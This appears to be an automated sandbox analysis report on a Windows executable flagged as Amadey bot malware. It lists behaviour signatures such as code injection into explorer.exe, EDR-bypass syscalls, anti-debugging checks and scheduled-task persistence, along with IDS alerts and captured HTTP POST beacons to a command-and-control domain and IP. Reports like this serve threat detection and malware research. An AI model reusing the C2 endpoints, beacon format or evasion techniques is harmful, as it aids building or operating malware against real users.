Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Overview

General Information

Sample name:BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Analysis ID:1546122
MD5:c52c721e095a91bb0d589dd0206d5f3d
SHA1:2089df73d6ec0b8c193ddf39bda7e603a0a0bd0a
SHA256:331f38a2128e273ac865be7c6722d4107ebf0cc77a5abd46965492dbad0fadf5
Tags:exeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BGUO31BLG4WQAOX9MA4VF71OJ1M.exe (PID: 6072 cmdline: "C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe" MD5: C52C721E095A91BB0D589DD0206D5F3D)
    • comp.exe (PID: 1356 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • QTAgent_40.exe (PID: 1820 cmdline: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe MD5: C52C721E095A91BB0D589DD0206D5F3D)
    • comp.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • QTAgent_40.exe (PID: 3632 cmdline: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe MD5: C52C721E095A91BB0D589DD0206D5F3D)
    • comp.exe (PID: 2220 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)
      • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 2012 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
BGUO31BLG4WQAOX9MA4VF71OJ1M.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        0.0.BGUO31BLG4WQAOX9MA4VF71OJ1M.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T14:25:18.189895+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949805TCP
          2024-10-31T14:25:55.832788+010020229301A Network Trojan was detected20.12.23.50443192.168.2.949990TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T14:25:40.089539+010028561471A Network Trojan was detected192.168.2.949930172.67.213.17380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T14:25:37.559393+010028561481A Network Trojan was detected192.168.2.949916172.67.213.17380TCP
          2024-10-31T14:25:42.511087+010028561481A Network Trojan was detected192.168.2.949946172.67.213.17380TCP
          2024-10-31T14:25:47.403495+010028561481A Network Trojan was detected192.168.2.949975172.67.213.17380TCP
          2024-10-31T14:25:52.486086+010028561481A Network Trojan was detected192.168.2.949988172.67.213.17380TCP
          2024-10-31T14:25:57.394572+010028561481A Network Trojan was detected192.168.2.949991172.67.213.17380TCP
          2024-10-31T14:26:02.314368+010028561481A Network Trojan was detected192.168.2.949993172.67.213.17380TCP
          2024-10-31T14:26:07.225159+010028561481A Network Trojan was detected192.168.2.949995172.67.213.17380TCP
          2024-10-31T14:26:12.105745+010028561481A Network Trojan was detected192.168.2.949997172.67.213.17380TCP
          2024-10-31T14:26:17.158031+010028561481A Network Trojan was detected192.168.2.949999172.67.213.17380TCP
          2024-10-31T14:26:22.152809+010028561481A Network Trojan was detected192.168.2.950001172.67.213.17380TCP
          2024-10-31T14:26:27.099760+010028561481A Network Trojan was detected192.168.2.950003172.67.213.17380TCP
          2024-10-31T14:26:32.108410+010028561481A Network Trojan was detected192.168.2.950005172.67.213.17380TCP
          2024-10-31T14:26:37.057362+010028561481A Network Trojan was detected192.168.2.950007172.67.213.17380TCP
          2024-10-31T14:26:42.002816+010028561481A Network Trojan was detected192.168.2.950009172.67.213.17380TCP
          2024-10-31T14:26:46.990327+010028561481A Network Trojan was detected192.168.2.950011172.67.213.17380TCP
          2024-10-31T14:26:51.935172+010028561481A Network Trojan was detected192.168.2.950013172.67.213.17380TCP
          2024-10-31T14:26:56.940098+010028561481A Network Trojan was detected192.168.2.950015172.67.213.17380TCP
          2024-10-31T14:27:01.600269+010028561481A Network Trojan was detected192.168.2.950017172.67.213.17380TCP
          2024-10-31T14:27:06.558317+010028561481A Network Trojan was detected192.168.2.950019172.67.213.17380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T14:25:35.128154+010028560971A Network Trojan was detected192.168.2.949903172.67.213.17380TCP
          2024-10-31T14:25:40.089539+010028560971A Network Trojan was detected192.168.2.949930172.67.213.17380TCP
          2024-10-31T14:25:45.009461+010028560971A Network Trojan was detected192.168.2.949962172.67.213.17380TCP
          2024-10-31T14:25:49.964778+010028560971A Network Trojan was detected192.168.2.949987172.67.213.17380TCP
          2024-10-31T14:25:55.004933+010028560971A Network Trojan was detected192.168.2.949989172.67.213.17380TCP
          2024-10-31T14:25:59.923064+010028560971A Network Trojan was detected192.168.2.949992172.67.213.17380TCP
          2024-10-31T14:26:04.816947+010028560971A Network Trojan was detected192.168.2.949994172.67.213.17380TCP
          2024-10-31T14:26:09.717993+010028560971A Network Trojan was detected192.168.2.949996172.67.213.17380TCP
          2024-10-31T14:26:14.590623+010028560971A Network Trojan was detected192.168.2.949998172.67.213.17380TCP
          2024-10-31T14:26:19.728567+010028560971A Network Trojan was detected192.168.2.950000172.67.213.17380TCP
          2024-10-31T14:26:24.678101+010028560971A Network Trojan was detected192.168.2.950002172.67.213.17380TCP
          2024-10-31T14:26:29.635646+010028560971A Network Trojan was detected192.168.2.950004172.67.213.17380TCP
          2024-10-31T14:26:34.627410+010028560971A Network Trojan was detected192.168.2.950006172.67.213.17380TCP
          2024-10-31T14:26:39.610237+010028560971A Network Trojan was detected192.168.2.950008172.67.213.17380TCP
          2024-10-31T14:26:44.584818+010028560971A Network Trojan was detected192.168.2.950010172.67.213.17380TCP
          2024-10-31T14:26:49.516602+010028560971A Network Trojan was detected192.168.2.950012172.67.213.17380TCP
          2024-10-31T14:26:54.439609+010028560971A Network Trojan was detected192.168.2.950014172.67.213.17380TCP
          2024-10-31T14:26:59.340883+010028560971A Network Trojan was detected192.168.2.950016172.67.213.17380TCP
          2024-10-31T14:27:04.183234+010028560971A Network Trojan was detected192.168.2.950018172.67.213.17380TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeReversingLabs: Detection: 13%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: C:\Users\user\AppData\Local\Temp\cckrnaaJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\pbxllkvlhugfJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\djivmxgJoe Sandbox ML: detected
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: Binary string: iassvcs.pdb source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr
          Source: Binary string: wntdll.pdbUGP source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: iassvcs.pdbGCTL source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1ED13 FindFirstFileExW,12_2_02F1ED13
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile opened: C:\Users\userJump to behavior

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49930 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49930 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49903 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49916 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49946 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49962 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49975 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49987 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49997 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50007 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50006 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49998 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49995 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50019 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50018 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50004 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49993 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50009 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49992 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50002 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50008 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50000 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50003 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49988 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50011 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50014 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50017 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49989 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50016 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50010 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49996 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:49994 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49999 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:49991 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50013 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50001 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50005 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.9:50012 -> 172.67.213.173:80
          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.9:50015 -> 172.67.213.173:80
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.213.173 80Jump to behavior
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
